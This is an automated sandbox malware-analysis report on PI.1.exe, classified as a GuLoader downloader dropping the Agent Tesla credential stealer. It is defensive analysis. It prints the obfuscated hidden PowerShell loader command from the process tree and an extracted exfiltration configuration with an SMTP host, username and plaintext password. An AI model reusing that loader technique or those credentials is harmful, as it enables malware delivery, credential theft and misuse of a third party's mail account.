Windows
Analysis Report
PI.1.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- PI.1.exe (PID: 7504 cmdline:
C:\Users\u ser\Deskto p\PI.1.exe MD5: FC8B93107558429854146361DA62E618) - powershell.exe (PID: 7608 cmdline:
powershell " -windows tyle hidde n "$Credib ilities=Ge t-Content 'C:\Users\ user\AppDa ta\Roaming \dyrekller s\Sanguine \Solano\Ce lebrates\N atkjole\Ca pron\Hoved person16.R ed';$Skrup kedet=$Cre dibilities .SubString (60665,3); .$Skrupked et($Credib ilities) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7628 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8024 cmdline:
C:\Windows \system32\ cmd.exe" / c "set /A 1^^0 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - wab.exe (PID: 7712 cmdline:
C:\Program Files (x8 6)\windows mail\wab. exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.scootero.cl", "Username": "sending01@scootero.cl", "Password": "Dangote1235$"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp: | 03/18/24-14:31:09.862635 |
SID: | 2855542 |
Source Port: | 49718 |
Destination Port: | 587 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 03/18/24-14:31:09.862635 |
SID: | 2840032 |
Source Port: | 49718 |
Destination Port: | 587 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 03/18/24-14:31:09.862635 |
SID: | 2851779 |
Source Port: | 49718 |
Destination Port: | 587 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 03/18/24-14:31:09.862549 |
SID: | 2030171 |
Source Port: | 49718 |
Destination Port: | 587 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
AV Detection |
---|
Source: | URL Reputation: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_0040635D | |
Source: | Code function: | 0_2_0040580B | |
Source: | Code function: | 0_2_004027FB |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | Windows user hook set: | Jump to behavior |
Source: | Code function: | 0_2_004052B8 |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Code function: | 0_2_0040326A |
Source: | Code function: | 0_2_004066E2 | |
Source: | Code function: | 0_2_00404AF5 | |
Source: | Code function: | 3_2_0514F3F8 | |
Source: | Code function: | 3_2_0514F0B0 | |
Source: | Code function: | 13_2_205BE399 | |
Source: | Code function: | 13_2_205BAA33 | |
Source: | Code function: | 13_2_205B4A98 | |
Source: | Code function: | 13_2_205B3E80 | |
Source: | Code function: | 13_2_205B41C8 | |
Source: | Code function: | 13_2_22EACC84 | |
Source: | Code function: | 13_2_22EA1F0B | |
Source: | Code function: | 13_2_2346B200 | |
Source: | Code function: | 13_2_2346C178 | |
Source: | Code function: | 13_2_23463040 | |
Source: | Code function: | 13_2_234665D0 | |
Source: | Code function: | 13_2_23465580 | |
Source: | Code function: | 13_2_23462348 | |
Source: | Code function: | 13_2_2346E3A0 | |
Source: | Code function: | 13_2_23460006 | |
Source: | Code function: | 13_2_23467680 | |
Source: | Code function: | 13_2_23465CBB |
Source: | Static PE information: |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_0040326A |
Source: | Code function: | 0_2_00404579 |
Source: | Code function: | 0_2_00402095 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 3_2_0514B501 | |
Source: | Code function: | 3_2_095E1D5E | |
Source: | Code function: | 3_2_095E2789 | |
Source: | Code function: | 3_2_095E234B | |
Source: | Code function: | 3_2_095E2789 | |
Source: | Code function: | 3_2_095E2789 | |
Source: | Code function: | 3_2_095E31B8 | |
Source: | Code function: | 3_2_095E0876 | |
Source: | Code function: | 3_2_095E14F7 | |
Source: | Code function: | 3_2_095E0A97 | |
Source: | Code function: | 3_2_095E28CB | |
Source: | Code function: | 13_2_03CE2789 | |
Source: | Code function: | 13_2_03CE31B8 | |
Source: | Code function: | 13_2_03CE234B | |
Source: | Code function: | 13_2_03CE2789 | |
Source: | Code function: | 13_2_03CE1D5E | |
Source: | Code function: | 13_2_03CE2789 | |
Source: | Code function: | 13_2_03CE14F7 | |
Source: | Code function: | 13_2_03CE0A97 | |
Source: | Code function: | 13_2_03CE28CB | |
Source: | Code function: | 13_2_03CE0876 | |
Source: | Code function: | 13_2_205BA1A1 | |
Source: | Code function: | 13_2_205B0CC2 |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Last function: |
Source: | Code function: | 0_2_0040635D | |
Source: | Code function: | 0_2_0040580B | |
Source: | Code function: | 0_2_004027FB |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3398 | ||
Source: | API call chain: | graph_0-3401 |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_0040326A |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 26 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | 111 Process Injection | 1 Obfuscated Files or Information | 1 Credentials in Registry | 221 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
